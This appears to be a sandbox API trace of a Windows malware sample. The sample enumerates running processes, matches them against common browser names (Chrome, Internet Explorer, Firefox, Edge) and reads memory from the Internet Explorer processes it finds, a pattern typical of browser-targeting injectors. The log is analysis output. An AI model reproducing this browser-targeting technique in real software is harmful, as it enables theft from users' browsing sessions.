	[0209.697] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.697] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0209.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.698] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.698] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0209.699] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x34e8
	[0209.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.699] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0209.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.699] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.699] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0209.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.700] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.700] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0209.701] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x34ec
	[0209.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.701] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0209.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.701] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.702] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0209.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.702] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.703] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0209.703] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x34f0
	[0209.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.704] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0209.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.704] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.704] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0209.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.704] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.705] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0209.705] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x34f4
	[0209.705] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.705] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0209.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.706] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.706] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0209.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.707] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.707] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0209.708] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x34f8
	[0209.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.708] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0209.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.708] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.709] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0209.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.709] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.710] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0209.710] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x34fc
	[0209.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.710] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0209.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.711] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.711] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0209.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.711] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.711] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0209.712] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x3500
	[0209.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.712] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0209.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.712] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.713] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0209.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.713] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.713] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0209.719] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x3504
	[0209.719] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.719] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0209.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.720] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.720] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0209.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.721] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.721] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0209.721] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x3508
	[0209.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.722] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0209.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.722] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.723] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.723] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0209.723] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.723] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.724] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0209.724] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x350c
	[0209.725] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.725] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0209.725] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.725] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.726] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0209.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.726] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.726] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0209.727] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x3510
	[0209.727] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.727] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0209.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.728] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.728] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0209.729] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.729] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.730] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0209.730] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x3514
	[0209.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.730] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0209.731] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.731] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.731] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.731] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0209.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.732] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.732] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0209.733] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x3518
	[0209.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.733] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0209.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.733] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0209.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.734] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0209.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.734] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.734] NtQueryInformationProcess (in: ProcessHandle=0x3518, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0209.734] ReadProcessMemory (in: hProcess=0x3518, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0209.734] ReadProcessMemory (in: hProcess=0x3518, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0209.734] ReadProcessMemory (in: hProcess=0x3518, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0209.734] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0209.735] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0209.735] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x351c
	[0209.735] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.735] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0209.736] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.736] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0209.736] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.736] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0209.736] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.736] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.736] NtQueryInformationProcess (in: ProcessHandle=0x351c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0209.737] ReadProcessMemory (in: hProcess=0x351c, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0209.737] ReadProcessMemory (in: hProcess=0x351c, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0209.737] ReadProcessMemory (in: hProcess=0x351c, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0209.737] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0209.737] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0209.738] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x3520
	[0209.738] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.738] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0209.738] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.738] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.738] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.738] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0209.739] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.739] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.739] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0209.740] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x3524
	[0209.740] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.740] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0209.741] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.741] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.741] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.741] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0209.742] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.742] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.742] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.743] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x3528
	[0209.743] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.743] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0209.743] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.743] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.743] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.743] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0209.744] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.744] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.744] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.745] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.745] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x352c
	[0209.745] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.746] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0209.746] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.746] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.746] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.746] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0209.746] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.746] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.747] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0209.747] CloseHandle (hObject=0x188) returned 1
	[0209.747] Sleep (dwMilliseconds=0x64) 
	[0209.853] GetCurrentProcessId () returned 0x110
	[0209.853] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0209.859] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0209.861] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0209.863] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0209.865] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x3530
	[0209.866] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.866] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0209.866] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.866] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.866] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.866] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0209.867] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.867] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.867] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0209.868] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x3534
	[0209.868] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.868] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0209.868] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.868] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.868] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.869] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0209.869] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.869] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.869] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0209.870] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x3538
	[0209.870] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.870] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0209.870] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.870] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.870] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.871] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0209.871] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.871] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
